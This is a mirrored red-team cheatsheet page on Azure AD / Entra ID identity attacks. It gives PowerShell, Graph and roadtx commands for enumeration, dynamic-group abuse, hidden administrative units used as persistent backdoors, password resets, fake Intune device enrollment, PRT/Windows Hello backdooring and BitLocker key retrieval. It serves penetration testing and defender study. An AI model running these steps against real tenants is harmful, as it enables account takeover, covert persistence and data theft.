daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-devices-users-sp.md (11376B)


      1 ---
      2 title: "Azure AD - IAM"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-devices-users-sp.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-devices-users-sp.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - IAM
     12 
     13 > Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource
     14 
     15 * Users (User, Groups, Dynamic Groups)
     16 * Devices
     17 * Service Principals (Application and Managed Identities)
     18 
     19 ## Users
     20 
     21 * List users: `Get-AzureADUser -All $true`
     22 * Enumerate groups
     23 
     24     ```ps1
     25     # List groups
     26     Get-AzureADGroup -All $true
     27     
     28     # Get members of a group
     29     Get-AzADGroup -DisplayName '<GROUP-NAME>'
     30     Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
     31     ```
     32 
     33 * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
     34 * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
     35 * Add user to a group
     36 
     37     ```ps1
     38     $groupid = "<group-id>"
     39     $targetmember = "<user-id>"
     40     $group = Get-MgGroup -GroupId $groupid
     41     $members = Get-MgGroupMember -GroupId $groupid
     42     New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember
     43     ```
     44 
     45 ### Dynamic Group Membership
     46 
     47 Get groups that allow Dynamic membership:
     48 
     49 * Powershell Azure AD: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}`
     50 * RoadRecon database: `select objectId, displayName, description, membershipRule, membershipRuleProcessingState, isMembershipRuleLocked from groups where membershipRule is not null;`
     51 
     52 Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")`
     53 Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group
     54 
     55 1. Open user's profile, click on **Manage**
     56 2. Click on **Resend** invite and to get an invitation URL
     57 3. Set the secondary email
     58 
     59     ```powershell
     60     PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose
     61     ```
     62 
     63 ### Administrative Unit
     64 
     65 Enumerate Administrative Units.
     66 
     67 ```ps1
     68 PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true
     69 PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
     70 PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
     71 PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
     72 PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
     73 PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
     74 ```
     75 
     76 Administrative Unit can be used as a persistence mechanism. When the `visibility` attribute is set to `HiddenMembership`, only members of the administrative unit can list other members of the administrative unit.
     77 
     78 ```ps1
     79 az rest \
     80   --method post \
     81   --url https://graph.microsoft.com/v1.0/directory/administrativeUnits \
     82   --body '{"displayName": "Hidden AU Administrative Unit", "isMemberManagementRestricted":false, "visibility": "HiddenMembership"}'
     83 ```
     84 
     85 * Create a new Administrative Unit using the `New-MgDirectoryAdministrativeUnit` cmdlet.
     86 
     87     ```ps1
     88     Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
     89     Import-Module Microsoft.Graph.Identity.DirectoryManagement
     90 
     91     $params = @{
     92         displayName = "Marketing Department"
     93         description = "Marketing Department Administration"
     94         visibility = "HiddenMembership"
     95     }
     96 
     97     New-MgDirectoryAdministrativeUnit -BodyParameter $params
     98     ```
     99 
    100 * Add a member with `New-MgDirectoryAdministrativeUnitMemberByRef`
    101 
    102     ```ps1
    103     Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
    104     Import-Module Microsoft.Graph.Identity.DirectoryManagement
    105 
    106     $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
    107     $paramsUser1 = @{
    108         "@odata.id" = "https://graph.microsoft.com/v1.0/users/52e26d18-d251-414f-af14-a4a93123b2b2"
    109     }
    110     New-MgDirectoryAdministrativeUnitMemberByRef -AdministrativeUnitId $administrativeUnitId -BodyParameter $paramsUser1
    111     ```
    112 
    113 * List members even when the administrative unit is hidden.
    114 
    115     ```ps1
    116     Connect-MgGraph -Scopes "AdministrativeUnit.Read.All", "Member.Read.Hidden", "Directory.Read.All"
    117     Import-Module Microsoft.Graph.Identity.DirectoryManagement
    118 
    119     $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
    120     Get-MgDirectoryAdministrativeUnitMemberAsUser -AdministrativeUnitId $administrativeUnitId
    121     ```
    122 
    123 * Assign the `User Administrator` role, its ID is `947ccf23-ee27-4951-8110-96c62c680311` in this tenant.
    124 
    125     ```ps1
    126     Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
    127     Import-Module Microsoft.Graph.Identity.DirectoryManagement
    128 
    129     $administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
    130     $userAdministratorRoleId = "947ccf23-ee27-4951-8110-96c62c680311"
    131     $params = @{
    132         roleId = $userAdministratorRoleId
    133         roleMemberInfo = @{
    134             id = "61b0d52f-a902-4769-9a09-c6528336b00a"
    135         }
    136     }
    137 
    138     New-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId $administrativeUnitId -BodyParameter $params
    139     ```
    140 
    141 * Now the user with the id `61b0d52f-a902-4769-9a09-c6528336b00a` can edit the property of the other users in the Administrative Units.
    142 
    143 Administrative Units can reset password of another user.
    144 
    145 ```powershell
    146 PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
    147 PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose
    148 ```
    149 
    150 ### Convert GUID to SID
    151 
    152 The user's Entra ID is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the Entra ID.
    153 
    154 ```powershell
    155 GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
    156 SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
    157 ```
    158 
    159 For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
    160 
    161 ## Devices
    162 
    163 ### List Devices
    164 
    165 ```ps1
    166 Connect-AzureAD
    167 Get-AzureADDevice
    168 $user = Get-AzureADUser -SearchString "username"
    169 Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
    170 ```
    171 
    172 ### Device State
    173 
    174 ```ps1
    175 PS> dsregcmd.exe /status
    176 +----------------------------------------------------------------------+
    177 | Device State |
    178 +----------------------------------------------------------------------+
    179  AzureAdJoined : YES
    180  EnterpriseJoined : NO
    181  DomainJoined : NO
    182  Device Name : jumpvm
    183 ```
    184 
    185 * [**Azure AD Joined**](https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large)
    186 * [**Workplace Joined**](https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large)
    187 * [**Hybrid Joined**](https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large)
    188 * [**Workplace joined on AADJ or Hybrid**](https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large)
    189 
    190 ### Join Devices
    191 
    192 [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
    193 
    194 * [secureworks/pytune](https://github.com/secureworks/pytune) - Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support.
    195 
    196     ```ps1
    197     usage: pytune.py [-h] {entra_join,entra_delete,enroll_intune,checkin,retire_intune,check_compliant,download_apps} ...
    198 
    199     python3 pytune.py entra_join -o Windows -d Windows_pytune -u testuser@*******.onmicrosoft.com -p ***********
    200     python3 pytune.py enroll_intune -o Windows -d Windows_pytune -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p ***********
    201     python3 pytune.py checkin -o Windows -d Windows_pytune -c Windows_pytune.pfx -m Windows_pytune_mdm.pfx -u testuser@*******.onmicrosoft.com -p ***********
    202     python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p ***********
    203     python3 pytune.py check_compliant -o Windows -c Windows_pytune.pfx -u testuser@*******.onmicrosoft.com -p *********** -H $HWHASH
    204     ```
    205 
    206 ### Register Devices
    207 
    208 ```ps1
    209 roadtx device -a register -n swkdeviceup
    210 ```
    211 
    212 ### Windows Hello for Business
    213 
    214 ```ps1
    215 roadtx.exe prtenrich --ngcmfa-drs-auth
    216 roadtx.exe winhello -k swkdevicebackdoor.key
    217 roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
    218 roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
    219 ```
    220 
    221 ### Bitlocker Keys
    222 
    223 ```ps1
    224 Install-Module Microsoft.Graph -Scope CurrentUser
    225 Import-Module Microsoft.Graph.Identity.SignIns
    226 Connect-MgGraph -Scopes BitLockerKey.Read.All
    227 Get-MgInformationProtectionBitlockerRecoveryKey -All
    228 Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
    229 ```
    230 
    231 ## Service Principals
    232 
    233 ```ps1
    234 PS C:\> Get-AzureADServicePrincipal
    235 
    236 ObjectId                             AppId                                DisplayName
    237 --------                             -----                                -----------
    238 00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
    239 012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
    240 06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
    241 092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
    242 0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
    243 0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
    244 0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
    245 0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>
    246 ```
    247 
    248 ## Other
    249 
    250 Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
    251 
    252 ```ps1
    253 roadtx getscope -s https://graph.microsoft.com/mail.read
    254 roadtx findscope -s https://graph.microsoft.com/mail.read
    255 ```
    256 
    257 ## References
    258 
    259 * [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)
    260 * [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
    261 * [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
    262 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
    263 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
    264 * [Hidden in Plain Sight: Abusing Entra ID Administrative Units for Sticky Persistence - Katie Knowles - September 16, 2024](https://securitylabs.datadoghq.com/articles/abusing-entra-id-administrative-units/)
    265 * [Create Sticky Backdoor User Through Restricted Management AU - Datadog, Inc](https://stratus-red-team.cloud/attack-techniques/entra-id/entra-id.persistence.restricted-au/)
    266 * [Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise - Yuya Chudo - December 11, 2024](https://i.blackhat.com/EU-24/Presentations/EU-24-Chudo-Unveiling-the-Power-of-Intune-Leveraging-Intune-for-Breaking-Into-Your-Cloud-and-On-Premise.pdf)